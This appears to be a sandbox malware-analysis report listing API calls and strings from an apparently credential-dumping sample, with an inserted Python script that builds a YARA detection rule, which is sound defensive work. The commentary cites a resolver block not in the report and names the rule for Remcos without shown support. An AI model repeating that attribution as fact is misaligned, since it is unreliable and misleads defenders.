                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • wcschr.MSVCRT ref: 0040E3B8
                          • memcpy.MSVCRT ref: 0040E3EC
                          • memcpy.MSVCRT ref: 0040E407
                          • memcpy.MSVCRT ref: 0040E422
                          • memcpy.MSVCRT ref: 0040E43D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                          • API String ID: 3073804840-2252543386
                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@_snwprintfwcscpy
                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                          • API String ID: 2899246560-1542517562
                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                          • String ID:
                          • API String ID: 3715365532-3916222277
                          • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                          • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                          APIs
                          • memset.MSVCRT ref: 0040DBCD
                          • memset.MSVCRT ref: 0040DBE9
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                          • wcscpy.MSVCRT ref: 0040DC2D
                          • wcscpy.MSVCRT ref: 0040DC3C
                          • wcscpy.MSVCRT ref: 0040DC4C
                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                          • wcscpy.MSVCRT ref: 0040DCC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                          • API String ID: 3330709923-517860148
                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040806A
                          • memset.MSVCRT ref: 0040807F
                          • _wtoi.MSVCRT ref: 004081AF
                          • _wcsicmp.MSVCRT ref: 004081C3
                          • memset.MSVCRT ref: 004081E4
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                          • String ID: logins$null
                          • API String ID: 2148543256-2163367763
                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • memset.MSVCRT ref: 004085CF
                          • memset.MSVCRT ref: 004085F1
                          • memset.MSVCRT ref: 00408606
                          • strcmp.MSVCRT ref: 00408645
                          • _mbscpy.MSVCRT ref: 004086DB
                          • _mbscpy.MSVCRT ref: 004086FA
                          • memset.MSVCRT ref: 0040870E
                          • strcmp.MSVCRT ref: 0040876B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                          • CloseHandle.KERNEL32(?), ref: 004087A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                          • String ID: ---
                          • API String ID: 3437578500-2854292027
                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                          APIs
                          • memset.MSVCRT ref: 0041087D
                          • memset.MSVCRT ref: 00410892
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                          • GetSysColor.USER32(0000000F), ref: 00410999
                          • DeleteObject.GDI32(?), ref: 004109D0
                          • DeleteObject.GDI32(?), ref: 004109D6
                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1010922700-0
                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                          APIs
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                          • malloc.MSVCRT ref: 004186B7
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                          • malloc.MSVCRT ref: 004186FE
                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$FullNamePath$malloc$Version
                          • String ID: |A
                          • API String ID: 4233704886-1717621600
                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                          • API String ID: 2081463915-1959339147
                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2012295524-70141382
                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                          • API String ID: 667068680-3953557276
                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
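The three functions above (the ntdll resolver at 00413542, the psapi.dll resolver at 004138ED and the Toolhelp resolver at 0041384C) do not import NtLoadDriver, EnumProcesses, CreateToolhelp32Snapshot and friends through the PE import table; they fetch each export by name with GetProcAddress at run time. Because GetProcAddress takes an ANSI string, every one of those names survives as a narrow literal in the unpacked image the report dumps at offset 00400000, which makes them a cheap hunting artefact for the in-memory payload (not for the .doc or the packed stages, where they need not appear in clear). The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses report "APIs" blocks in the format printed above, recovers which module each export was resolved from, and emits a YARA rule over the literals. The excerpt is transcribed from the three blocks above; the rule name, the per-module tag scheme and the 8-of-18 threshold are my own choices.

```python
# Added example, written for this page: it is not code from the Joe Sandbox
# report or from the sample.  The excerpt below is transcribed from the three
# resolver blocks above; rule name, tag scheme and threshold are assumptions.
import re
from collections import defaultdict

# Bullet lines as the report prints them, each block closed by its "String ID:"
# line.  Note the sandbox did not recover the module handle in every
# GetProcAddress call, so the export name is not always the second argument.
REPORT_EXCERPT = """\
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
APIs
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
"""

# "• [Part of subcall function XXXXXXXX: ]Func.MODULE(args), ref: XXXXXXXX"
CALL_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                     r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")      # looks like an export name
HEX8_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")    # looks like a recovered DWORD
LOADERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA"}


def extract_resolved_apis(report_text):
    """{module: [export names in resolution order]} for every GetProcAddress call.
    Module = the '*.dll' literal passed to GetModuleHandle/LoadLibrary if the
    sandbox recovered it, else the '*.dll' entry of the block's String ID list."""
    resolved = defaultdict(list)
    module, names = None, []

    def flush():
        nonlocal module, names
        if names:
            resolved[module or "unknown"].extend(names)
        module, names = None, []

    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":                              # new function block
            flush()
        elif line.startswith("• String ID:"):           # last line of a block
            if module is None:
                dlls = [s.strip().lower() for s in line.split(":", 1)[1].split("$")
                        if s.strip().lower().endswith(".dll")]
                module = dlls[0] if dlls else None
            flush()
        elif (m := CALL_RE.match(line)):
            func, args = m.group(1), [a.strip() for a in m.group(3).split(",")]
            if func in LOADERS and args[0].lower().endswith(".dll"):
                module = args[0].lower()
            elif func == "GetProcAddress":
                # LPCSTR export name: first identifier-looking, non-DWORD argument.
                for tok in args:
                    if IDENT_RE.match(tok) and not HEX8_RE.match(tok):
                        names.append(tok)
                        break
    flush()
    return dict(resolved)


def yara_rule(resolved, name="dynamic_api_resolution_remcos_payload", minimum=8):
    """YARA rule over the resolved names: narrow literals (GetProcAddress is
    ANSI-only), hence 'ascii'; the threshold avoids firing on a few lookups."""
    lines = [f"rule {name}", "{", "    strings:"]
    for module, exports in sorted(resolved.items()):
        tag = module.split(".")[0]
        lines += [f'        ${tag}_{e} = "{e}" ascii' for e in exports]
    lines += ["    condition:", f"        uint16(0) == 0x5A4D and {minimum} of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(yara_rule(extract_resolved_apis(REPORT_EXCERPT)))
```

Run the script to print the rule, then scan the 0x400000 memory dump (or an unpacked payload) with it. NtSuspendProcess, NtResumeProcess and the Toolhelp set are also resolved by legitimate process-management tools, which is why the condition demands eight of the eighteen literals together rather than any single one; tighten or loosen the threshold against your own clean-binary corpus before deploying it.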
                          APIs
                          • GetDC.USER32(00000000), ref: 004121FF
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                          • SelectObject.GDI32(?,?), ref: 00412251
                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                          • SetCursor.USER32(00000000), ref: 004122BC
                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                          • memcpy.MSVCRT ref: 0041234D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                          • String ID:
                          • API String ID: 1700100422-0
                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004111E0
                          • GetWindowRect.USER32(?,?), ref: 004111F6
                          • GetWindowRect.USER32(?,?), ref: 0041120C
                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                          • GetWindowRect.USER32(00000000), ref: 0041124D
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                          • String ID:
                          • API String ID: 552707033-0
                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                          • memcpy.MSVCRT ref: 0040C11B
                          • strchr.MSVCRT ref: 0040C140
                          • strchr.MSVCRT ref: 0040C151
                          • _strlwr.MSVCRT ref: 0040C15F
                          • memset.MSVCRT ref: 0040C17A
                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                          • String ID: 4$h
                          • API String ID: 4066021378-1856150674
                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: %%0.%df
                          • API String ID: 3473751417-763548558
